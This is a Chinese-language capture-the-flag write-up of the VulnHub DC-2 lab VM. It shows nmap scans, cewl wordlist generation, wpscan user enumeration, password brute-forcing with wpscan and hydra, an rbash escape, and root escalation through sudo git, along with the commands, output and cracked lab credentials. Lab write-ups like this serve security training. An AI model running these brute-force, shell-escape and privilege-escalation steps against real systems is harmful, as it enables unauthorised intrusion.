2020-1-5 总结
靶机下载地址:www.vulnhub.com
dc2靶机测试:
为了方便以后多次实验。虚拟机都做好快照
用VMware虚拟机打开dc2 ,网卡调整到nat模式。查看mac地址。记录下来:00:0C:29:5D:32:42
开一台kali虚拟机。同样调整到nat模式。这样的话2台主机都在同一个局域网了。
为了方便以后多次实验。虚拟机都做好快照
2台虚拟机开机
在kali上,查看自己的IP地址:ip addr 。查看发现自己所在的IP地址是:192.168.71.141
nmap开起来。nmap -sP 192.168.71.0/24
扫描发现,一共有5台机器。分别是 192.168.71.1/2/254/141/161 前面的1=物理机,2=是虚拟dhcp,254=网关,141=是kali自己。所以断定192.168.71.161就是dc2靶机。用上面的mac对比一下。验证判断是正确的。
nmap -A 192.168.71.161 -p- -oN nmap-A.txt 开始收集这台机器的信息。保存在当前目录下的nmap-A.txt
=========
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-generator: WordPress 4.7.10
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: DC-2 – Just another WordPress site
|_https-redirect: ERROR: Script execution failed (use -d to debug)
7744/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
| ssh-hostkey:
| 1024 52:51:7b:6e:70:a4:33:7a:d2:4b:e1:0b:5a:0f:9e:d7 (DSA)
| 2048 59:11:d8:af:38:51:8f:41:a7:44:b3:28:03:80:99:42 (RSA)
| 256 df:18:1d:74:26:ce:c1:4f:6f:2f:c1:26:54:31:51:91 (ECDSA)
|_ 256 d9:38:5f:99:7c:0d:64:7e:1d:46:f6:e9:7c:c6:37:17 (ED25519)
=========
从上面的内容分析做出如下决定。在浏览器访问 192.168.71.161.发现一直在跳转。
vim /etc/hosts
添加一条记录:
192.168.71.161 dc-2
继续浏览器访问。发现可以正常跳转到dc-2的域名上。
在网页上。发现有flag 内容如下:
=====
Flag
Flag 1:
Your usual wordlists probably won’t work, so instead, maybe you just need to be cewl.
More passwords is always better, but sometimes you just can’t win them all.
Log in as one to see the next flag.
If you can’t find it, log in as another.
=====
根据以上内容。提示说要用cewl 。
在kali上。看看有没有这个软件。
cewl
有下面的提示:
=======
root@kali:~/dc2# cewl
CeWL 5.4.4.1 (Arkanoid) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
Missing URL argument (try --help)
=======
kali已经自带了这个软件了。通过上面的信息。我知道了这个网址是用了wordress 4.7.10搭建的
所以直接开搞。
cewl dc-2 > pwd.dic #根据网页内容。生成一个密码字典。放在当前目录上的pwd.dic
wc -l pwd.dic #查看一下有多少行数据。大概是266条数据。
有密码字典了。就差用户名了。上工具获取用户名:
wpscan --url dc-2 -e -u #列出网站的后台用户。
执行后。发现有很多漏洞。先不关心他们。我关心得是用户名。
=====
[i] User(s) Identified:
[+] admin
| Detected By: Rss Generator (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] jerry
| Detected By: Wp Json Api (Aggressive Detection)
| - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Confirmed By:
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] tom
| Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] Finished: Sun Jan 5 01:12:58 2020
[+] Requests Done: 55
[+] Cached Requests: 6
[+] Data Sent: 12.366 KB
[+] Data Received: 514.12 KB
[+] Memory used: 131.5 MB
[+] Elapsed time: 00:00:07
=====
从上面提示得信息中可以发现。后台有3个用户。
admin
tom
jerry
vim user.dic 编辑创建 user.dic
把上面得到得3条记录写到user.dic上。
有用户名。有密码。有地址。就可以用爆破得方式得到正确的用户名和密码了
wpscan --url dc-2 -U user.dic -P pwd.dic
执行后。发现有很多提示。忽略不需要的。得到下面的消息。
====
[i] Valid Combinations Found:
| Username: jerry, Password: adipiscing
| Username: tom, Password: parturient
====
有用户名和密码。登录后台看看。
登录jerry账号后台。在pages选项卡里面。发现了一个flag2
点开后有下面的提示:
=====
Flag 2:
If you can't exploit WordPress and take a shortcut, there is another way.
Hope you found another entry point.
=====
好像没有上面思路了。
上面的收集数据过程。有ssh的消息
上hydra爆破ssh密码。
hydra ssh://192.168.71.161 -s 7744 -L user.dic -P pwd.dic -vV -o ssh.txt -t 50
执行爆破后。发现了tom的ssh信息。
=====
# Hydra v9.0 run at 2020-01-05 01:29:04 on 192.168.71.161 ssh (hydra -s 7744 -L user.dic -P pass.dic -vV -t 64 -o ssh.txt ssh://192.168.71.161)
[7744][ssh] host: 192.168.71.161 login: tom password: parturient
=====
竟然跟后台的账号密码是一样的。也是懒。顽皮
ssh登录上去。
ssh tome@192.168.71.161 -p 7744
输入yes 确认后输入密码
登录成功。ls发现了flag3.txt
cat flag3.txt
=====
tom@DC-2:~$ cat flag3.txt
-rbash: cat: command not found
tom@DC-2:~$ sudo -l
-rbash: sudo: command not found
=====
原来是rbash .权限不够。
纠结。
尝试su
su - jerry
su 也没有权限
必须得绕过权限才行呀。
依次执下面得命令
BASH_CMDS[A]=/bin/sh;a
/bin/bash
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin
绕过成功。
cat flag3.txt 发现可以看到内容了。
=======
tom@DC-2:~$ su - jerry
-rbash: su: command not found
tom@DC-2:~$ BASH_CMDS[a]=/bin/bash
tom@DC-2:~$ a
tom@DC-2:~$ /bin/bash
tom@DC-2:~$ export PATH=$PATH:/bin/
tom@DC-2:~$ export PATH=$PATH:/usr/bin
tom@DC-2:~$ cat flag3.txt
Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.
=======
还没完
=======
tom@DC-2:~$ cd /home/jerry/
tom@DC-2:/home/jerry$ ls
flag4.txt
tom@DC-2:/home/jerry$ cat /flag4.txt
cat: /flag4.txt: No such file or directory
tom@DC-2:/home/jerry$ cat flag4.txt
Good to see that you've made it this far - but you're not home yet.
You still need to get the final flag (the only flag that really counts!!!).
No hints here - you're on your own now. :-)
Go on - git outta here!!!!
===========
尝试用网站的密码登录
竟然登录成功了。ls
查看发现了
su - jerry 输入网站后台得得jerry的密码。竟然登录成功了。
看看有没有sudo权限。
sudo -l
======
tom@DC-2:/home/jerry$ su - jerry
Password:
jerry@DC-2:~$ sudo -l
Matching Defaults entries for jerry on DC-2:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User jerry may run the following commands on DC-2:
(root) NOPASSWD: /usr/bin/git
jerry@DC-2:~$
========
发现有git的sudo权限。
sudo git -p help #-p 交互模式
提权
!/bin/bash
=====
'git help -a' and 'git help -g' lists available subcommands and some
!/bin/bash
root@DC-2:/home/jerry#
====
提权成功。
cd /root
ls
=====
root@DC-2:/home/jerry# cd /root
root@DC-2:~# ls
final-flag.txt
root@DC-2:~#
=====
root@DC-2:~# ls
final-flag.txt
root@DC-2:~# cat final-flag.txt
__ __ _ _ _ _
/ / /\ \ \___| | | __| | ___ _ __ ___ / \
\ \/ \/ / _ \ | | / _` |/ _ \| '_ \ / _ \/ /
\ /\ / __/ | | | (_| | (_) | | | | __/\_/
\/ \/ \___|_|_| \__,_|\___/|_| |_|\___\/
Congratulatons!!!
A special thanks to all those who sent me tweets
and provided me with feedback - it's all greatly
appreciated.
If you enjoyed this CTF, send me a tweet via @DCAU7.
root@DC-2:~#
到这里。已经拿到了最后的flag了。
以上是我的一次尝试。因为是第二次做。没有把走的弯路写出来。
怕自己忘记留个flag
133
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
